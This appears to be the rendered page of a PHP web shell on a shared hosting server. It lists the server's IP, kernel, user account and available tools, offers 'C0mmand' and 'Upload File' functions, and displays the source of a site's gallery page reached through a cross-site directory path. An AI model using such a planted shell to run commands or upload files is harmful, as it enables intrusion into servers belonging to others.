Server IP : 103.53.40.154 / Your IP : 3.21.12.88 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/fastelevator.in/../ntimachinery.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php include('conn/config.php'); $gallery_details=header_tags('our-gallery'); $contact_details=contact_det(); ?> <!DOCTYPE html> <html lang="en"> <head> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <meta http-equiv="content-type" content="text/html; charset=UTF-8"/> <title><?php echo $gallery_details['page_title']; ?></title> <meta name="description" content="<?php echo $gallery_details['message']; ?>"> <meta name="robots" content="index, follow" /> <meta name="language" content="english"> <?php include 'inc/top-links.php';?> </head> <body> <div class="page-wrapper"> <!-- Preloader --> <div class="preloader"></div> <!-- Main Header--> <?php include 'inc/header.php';?> <!--Page Title--> <section class="page-title" style="background-image:url(<?=BASE_URL?>images/background/10.jpg);"> <div class="auto-container"> <div class="inner-container clearfix"> <div class="title-box"> <h1>Our Gallery</h1> </div> <ul class="bread-crumb clearfix"> <li><a href="<=BASE_URL>">Home</a></li> <li>Our Gallery</li> </ul> </div> </div> </section> <!--End Page Title--> <!-- Projects Section --> <section class="projects-section alternate"> <div class="auto-container"> <!--MixitUp Galery--> <div class="mixitup-gallery"> <div class="filter-list row"> <!-- Project Block --><?php $query=mysqli_query($conn,"select * from sucess_story where status='1'"); while($row=mysqli_fetch_array($query)) { ?> <div class="project-block all mix interior architecture landescape col-lg-4 col-md-6 col-sm-12"> <div class="image-box"> <figure class="image"><img src="<?=BASE_URL_IMG?>uploads/gallery/<?=$row['image']?>" alt=""></figure> <div class="overlay-box"> <div class="btn-box"> <a href="<?=BASE_URL_IMG?>uploads/gallery/<?=$row['image']?>" class="lightbox-image" data-fancybox="gallery"><i class="fa fa-search"></i></a> </div> </div> </div> </div> <?php }?> </div> </div> </div> </section> <?php include 'inc/footer.php';?> </body> </html>